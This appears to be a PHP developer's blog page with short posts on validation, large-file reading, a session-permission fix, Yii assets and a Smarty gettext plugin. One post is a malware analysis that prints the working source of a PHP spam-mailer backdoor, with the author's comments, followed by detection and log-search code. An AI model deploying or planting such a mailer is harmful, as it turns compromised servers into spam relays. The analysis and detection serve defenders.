Differences between character counting in PHP and Javascript

I’ve recently coded my own validation rules for forms. I’m checking the length of a string on the client side and also on the server side (obviously it’s good practice). After my script went into production, users started to complain about validation errors (even though the data in the form was entered properly). This is really strange but…

PHP reading problem with files larger than 2 GB

If you ever have a problem opening (fopen) and reading (fread) files larger than 2 GB in your PHP script, check the version of your scripting engine. In my case switching to 64-bit solved the problem. Please mind that this error is very hard to debug because PHP does not log anything (same as MS IIS) in such a case. It simply resets the client connection…

Permission denied when script is trying to execute ps_files_cleanup_dir

This is a pretty common problem. I’ve encountered it on a recent version of the Debian operating system. When you see something like this:

Notice:  session_start(): ps_files_cleanup_dir: opendir(/var/lib/php5/sessions) failed: Permission denied (13) in /mnt/www-data/htdocs/raportMNW/inc/bryanjhv/slim-session/src/Slim/Middleware/Session.php on line 110

You can fix that easily with the following Linux commands:

sudo nano /etc/php5/apache2/php.ini

Now use CTRL+W to find the string session.save_path and configure it like this:

session.save_path = "/tmp"

Save your file using CTRL+X and restart the Apache2 service:

sudo service apache2 restart

And voilà!
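
Why the Notice appears and what the /tmp setting changes, as an added example (not code from the original post): it models the read-permission check behind opendir() and flags a session directory whose file names, which embed session ids, can be listed by any local user. The root-owned mode 1733 for Debian's packaged session directory and uid/gid 33 for www-data are assumptions about a stock install.

```python
import os
import stat

def can_list(mode, owner_uid, owner_gid, uid, gids):
    """True if a process with uid/gids may opendir() a directory (ACLs ignored)."""
    if uid == 0:
        return True
    if uid == owner_uid:
        return bool(mode & stat.S_IRUSR)
    if owner_gid in gids:
        return bool(mode & stat.S_IRGRP)
    return bool(mode & stat.S_IROTH)

def audit_session_dir(mode, owner_uid, owner_gid, php_uid, php_gids):
    """Return findings for a directory used as session.save_path."""
    findings = []
    if not can_list(mode, owner_uid, owner_gid, php_uid, php_gids):
        # PHP's built-in garbage collector cannot opendir(): the Notice above
        findings.append("php-gc-opendir-denied")
    if mode & stat.S_IROTH:
        # files are named sess_<session id>, so a listing reveals live ids
        findings.append("session-ids-listable-by-any-local-user")
    if mode & stat.S_IWOTH and not mode & stat.S_ISVTX:
        findings.append("world-writable-without-sticky-bit")
    return findings

def audit_path(path, php_uid, php_gids):
    """Audit a real directory, e.g. the value of session.save_path."""
    st = os.stat(path)
    return audit_session_dir(stat.S_IMODE(st.st_mode), st.st_uid, st.st_gid,
                             php_uid, php_gids)

WWW_DATA = 33  # assumption: uid/gid of www-data on a stock Debian install

if __name__ == "__main__":
    # Constructed cases: (label, mode, owner uid, owner gid)
    for label, mode, uid, gid in [
        ("Debian default, root-owned 1733", 0o1733, 0, 0),
        ("/tmp, root-owned 1777", 0o1777, 0, 0),
        ("dedicated dir, www-data-owned 0700", 0o700, WWW_DATA, WWW_DATA),
    ]:
        print(label, audit_session_dir(mode, uid, gid, WWW_DATA, [WWW_DATA]))
```

A directory owned by the web server user with mode 0700 produces no findings: PHP can clean it up and other local users cannot list it.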

Force Yii to republish assets every page refresh

During webapp development you’ll often need to republish assets. When you publish assets using a directory path, the framework won’t republish them automatically. So what can you do? It’s simple: use the YII_DEBUG constant as the fourth argument of the publish function.

$assetPath = Yii::app()->assetManager->publish(Yii::getPathOfAlias('application.modules.components.assets'), false, 1, YII_DEBUG);

From this moment Yii will republish assets on every page refresh, but only in debug mode (it won’t consume your resources in production mode).

PHP malicious code analysis no. 1

I found this piece of PHP malware code on a compromised web server that I started to administer. Its name was a random character string, e.g. acbjxuu.php. There were about 20 more scripts of this kind. It’s a rather simple script for spamming purposes. To help you understand it, I’ve written what it’s doing in comments between the code lines.

if (isset($_POST['task']))
{
	// be sure to display all PHP errors
	error_reporting(E_ALL);
	ini_set('display_errors', TRUE);
	// raise the PHP memory limit to 512M
	ini_set('memory_limit', '512M');
	// disable PHP execution time limit
	set_time_limit(0);
	ini_set('max_execution_time',0);
	ini_set('set_time_limit',0);
 
	// get serialized array from POST var named task
	// example array structure: array(array('to'=>'[email protected]', 'msg'=>'message content', 'subj'=>'Message subject ex. cheap cialis :)'));
	$x = unserialize(base64_decode($_POST['task']));
 
	// if task variable was wrongly serialized, just die silently...
	if ($x==false) {exit();}
 
 
	$send_from = base64_encode('http://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
 
	// now send half a million of viagra & cialis related mails... 
	foreach ($x as $arr)
	{
		echo $arr['to']."\r\n";
 
		$arr['msg'] = str_replace('[send_from_url]',$send_from,$arr['msg']);
 
		mail($arr['to'],$arr['subj'],$arr['msg'],"MIME-Version: 1.0\r\nContent-type: text/html; charset=windows-1251\r\n");
	}
	exit('SEND OK');
}

I’ll look in the logs for IP addresses that tried to reach these scripts. Maybe I’ll find something interesting. Wish me good luck and monitor your webserver contents!
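
The two follow-ups mentioned above (checking web server contents and looking in logs for clients that reached the scripts), as an added example that is not part of the original post: it scores PHP source for the traits of this mailer and counts POST requests per client IP to flagged file names. The trait names, the sample source and the log lines are constructed, and the access log is assumed to be in Apache combined format.

```python
import re
from collections import Counter

# Traits of the mailer above: unserialized POST data, no time limit, mail().
TRAITS = {
    "unserialize_post": re.compile(
        r"unserialize\s*\(\s*base64_decode\s*\(\s*\$_(POST|REQUEST|COOKIE)", re.I),
    "no_time_limit": re.compile(r"set_time_limit\s*\(\s*0\s*\)", re.I),
    # bare mail( only; skips ->mail(, ::mail(, $mail( and sendmail(
    "mail_call": re.compile(r"(?<![\w>:$])mail\s*\(", re.I),
}

def score_php_source(source):
    """Return the sorted names of the traits present in one PHP file's text."""
    return sorted(name for name, rx in TRAITS.items() if rx.search(source))

# Combined Log Format prefix: client IP, ident, user, [time], "METHOD path ..."
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)')

def posts_to_scripts(log_lines, script_names):
    """Count POST requests per client IP whose target file is a flagged script."""
    hits = Counter()
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, method, path = m.groups()
        basename = path.split("?", 1)[0].rsplit("/", 1)[-1]
        if method == "POST" and basename in script_names:
            hits[ip] += 1
    return hits

# Constructed samples (not taken from the compromised server).
SAMPLE_PHP = """<?php
if (isset($_POST['task'])) {
    set_time_limit(0);
    $x = unserialize(base64_decode($_POST['task']));
    foreach ($x as $arr) { mail($arr['to'], $arr['subj'], $arr['msg']); }
}
"""
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Mar/2015:04:11:02 +0100] "POST /acbjxuu.php HTTP/1.1" 200 5123',
    '203.0.113.7 - - [12/Mar/2015:04:19:40 +0100] "POST /img/acbjxuu.php HTTP/1.1" 200 4870',
    '198.51.100.23 - - [12/Mar/2015:05:02:13 +0100] "GET /acbjxuu.php HTTP/1.1" 200 0',
    '198.51.100.23 - - [12/Mar/2015:05:02:15 +0100] "POST /index.php HTTP/1.1" 200 812',
]

if __name__ == "__main__":
    print(score_php_source(SAMPLE_PHP), posts_to_scripts(SAMPLE_LOG, {"acbjxuu.php"}))
```

A file that shows all three traits deserves manual review; a single trait such as a bare mail() call is common in legitimate code.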

Smarty gettext with domain support (block t plugin) [deprecated]

Attention! The official Gettext plugin for Smarty has had domain support since version 1.1. Check the official repository: https://github.com/smarty-gettext/smarty-gettext.

Description:

This is a modification of the Smarty gettext plugin. It enables domain support and utilizes a gettext wrapper for PHP.

Why do I use such a wrapper for gettext? It’s simple: not every server has native support for translation. This crafty script gives you a fallback in case it does not.

Usage example:

Init before any template is parsed by Smarty:

// include gettext wrapper for PHP
include('./php-gettext/gettext.inc');
 
// set locale
T_setlocale(LC_MESSAGES, 'en_US');
 
// load lang file
/* loads ./lang/en_US/LC_MESSAGES/example.mo (do not close path with final slash) */
T_bindtextdomain('example', './lang'); 
T_bind_textdomain_codeset('example', 'utf-8'); /* just in case */ 
 
// set default domain 
T_textdomain('default');

Smarty syntax example:

{t domain="example"}This text will be translated using gettext domain example.{/t}
{t}This text will be translated using standard gettext domain.{/t}

Installation:

Simply put the file block.t.php into the Smarty plugins directory.

Download: